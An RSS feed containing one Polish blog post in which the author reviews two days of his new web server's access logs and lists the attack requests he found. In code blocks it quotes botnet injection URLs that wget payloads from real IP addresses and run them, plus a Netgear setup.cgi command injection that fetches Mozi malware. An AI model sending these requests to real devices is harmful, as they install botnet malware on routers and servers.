<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>logs &amp;mdash; arek o sofcie</title>
    <link>https://baal.ar76.eu/arek/tag:logs</link>
    <description>Różności na temat tworzenia oprogramowania</description>
    <pubDate>Mon, 04 May 2026 18:58:55 +0200</pubDate>
    <item>
      <title>Uroki posiadania serwera WWW</title>
      <link>https://baal.ar76.eu/arek/uroki-posiadania-serwera-www</link>
      <description>&lt;![CDATA[Najłatwiej dowiedzieć się tym co jest na topie jeśli chodzi o ataki na serwery http, gdy postawi się własny. !--more--&#xA;&#xA;Na moim blogu nic jeszcze nie ma, nie próbowałem go w żaden sposób promować (bo po co puste strony promować), a wystarczy przeanalizować logi z dwóch dni, żeby poznać całkiem ciekawe urle.&#xA;&#xA;Na przykład najpopularniejszy request, to&#xA;/boaform/admin/formLogin&#xA;Nie mam nawet pojęcia czym jest ten boa (8,43% requestów).&#xA;&#xA;Kolejny fajny:&#xA;/shell?cd+/tmp;rm+-rf+;wget+149.3.170.181/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws&#xA;&#xA;/shell?cd+/tmp;rm+-rf+;wget+185.132.53.147/hakaibin/h4k4i.arm7;chmod+777+/tmp/h4k4i.arm7;sh+/tmp/h4k4i.arm7+hakai.Rep.Jaws&#xA;Nie wiem co to robi, ale przynajmniej wiem skąd to pobrać - i są dwa serwery, gdyby jeden się zepsuł.&#xA;&#xA;A potem seria GET-ów do wp-login.php pod różnymi ścieżkami. Zgaduję, że to wordpress. &#xA;&#xA;I jeszcze jeden z tych ciekawszych:&#xA;/setup.cgi?nextfile=netgear.cfg&amp;todo=syscmd&amp;cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&amp;curpath=/&amp;currentsetting.htm=1&#xA;&#xA;Tutaj adres jest dość ciekawy. 192.168.0.0/16 to lokalna, nieroutowana pula adresów. Nie mam pojęcia, czy to przypadkowy request, czy też coś fajnego można znaleźć na routerach netgear.&#xA;&#xA;Przy okazji, całkiem fajnym konsolowym narzędziem do analizy logów jest goaccess.io. &#xA;&#xA;Proste i nawet ładnie wygląda.&#xA;&#xA;goaccess w działaniu&#xA;&#xA;#goaccess #http #www #logs &#xA;&#xA;@arkr]]&gt;</description>
      <content:encoded><![CDATA[<p>Najłatwiej dowiedzieć się tym co jest na topie jeśli chodzi o ataki na serwery http, gdy postawi się własny. </p>

<p>Na moim blogu nic jeszcze nie ma, nie próbowałem go w żaden sposób promować (bo po co puste strony promować), a wystarczy przeanalizować logi z dwóch dni, żeby poznać całkiem ciekawe urle.</p>

<p>Na przykład najpopularniejszy request, to</p>

<pre><code>/boaform/admin/formLogin
</code></pre>

<p>Nie mam nawet pojęcia czym jest ten <em>boa</em> (8,43% requestów).</p>

<p>Kolejny fajny:</p>

<pre><code>/shell?cd+/tmp;rm+-rf+*;wget+149.3.170.181/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws

/shell?cd+/tmp;rm+-rf+*;wget+185.132.53.147/hakaibin/h4k4i.arm7;chmod+777+/tmp/h4k4i.arm7;sh+/tmp/h4k4i.arm7+hakai.Rep.Jaws
</code></pre>

<p>Nie wiem co to robi, ale przynajmniej wiem skąd to pobrać – i są dwa serwery, gdyby jeden się zepsuł.</p>

<p>A potem seria GET-ów do <code>wp-login.php</code> pod różnymi ścieżkami. Zgaduję, że to wordpress.</p>

<p>I jeszcze jeden z tych ciekawszych:</p>

<pre><code>/setup.cgi?next_file=netgear.cfg&amp;todo=syscmd&amp;cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&amp;curpath=/&amp;currentsetting.htm=1
</code></pre>

<p>Tutaj adres jest dość ciekawy. 192.168.0.0/16 to lokalna, nieroutowana pula adresów. Nie mam pojęcia, czy to przypadkowy request, czy też coś fajnego można znaleźć na routerach netgear.</p>

<p>Przy okazji, całkiem fajnym konsolowym narzędziem do analizy logów jest <a href="https://goaccess.io/" rel="nofollow">goaccess.io</a>.</p>

<p>Proste i nawet ładnie wygląda.</p>

<p><img src="/assets/goaccess.png" alt="goaccess w działaniu"></p>

<p><a href="/arek/tag:goaccess" class="hashtag" rel="nofollow"><span>#</span><span class="p-category">goaccess</span></a> <a href="/arek/tag:http" class="hashtag" rel="nofollow"><span>#</span><span class="p-category">http</span></a> <a href="/arek/tag:www" class="hashtag" rel="nofollow"><span>#</span><span class="p-category">www</span></a> <a href="/arek/tag:logs" class="hashtag" rel="nofollow"><span>#</span><span class="p-category">logs</span></a></p>

<p><a href="https://mastodon.social/@ark_r" rel="nofollow">@ark_r</a></p>
]]></content:encoded>
      <guid>https://baal.ar76.eu/arek/uroki-posiadania-serwera-www</guid>
      <pubDate>Thu, 10 Sep 2020 20:33:48 +0000</pubDate>
    </item>
  </channel>
</rss>